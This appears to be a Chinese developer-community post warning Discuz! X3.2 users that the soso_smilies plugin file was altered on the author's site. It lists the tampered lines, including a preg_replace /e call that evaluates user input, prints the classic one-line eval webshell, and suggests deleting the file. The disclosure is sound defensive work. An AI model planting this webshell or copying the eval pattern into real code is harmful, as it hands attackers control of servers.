用DZX3.2的小伙伴们注意了,DZ3.2安全很不完善。下面是本人网站被改写的一段代码。
第61行: if($_GET['ac'] == 'pm' && $_GET['mod'] == 'spacecp') {
第62行: if(empty($_GET['op'])) {
第64行: } elseif($_GET['op'] == 'showmsg') {
第67行: } elseif($_GET['subop'] == 'view' && $_GET['do'] == 'pm' && $_GET['mod'] == 'space') {
第113行: if(!empty($_GET['message'])) {
第139行: if($_GET['ac'] == 'profile' && submitcheck('profilesubmitbtn') && !empty($_POST['sightml'])) {
第140行: $_POST['sightml'] = preg_replace("/\{\:soso_((e\d+)|(_\d+_\d))\:\}/e", '$this->_soso_smiles("\\1", -1, 0, 1)', $_POST['sightml'], $_G['setting']['maxsmilies']);
第152行: } elseif($_GET['op'] == 'showchatmsg' && $GLOBALS['list']) {
第163行: if(!empty($_GET['subop'])) {
黑客在php文件中插入<?php @eval($_POST['黑客的密码']);?>这样的语句,来当做控制网站的后门,利用改后门能完全控制网站任意文件这就被称为一句话木马,它是基于B/S结构的。
被篡改路径:
..//source/plugin/soso_smilies/soso.class.php
修复方法:直接删除soso.class.php文件。或者改写以上代码段
版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。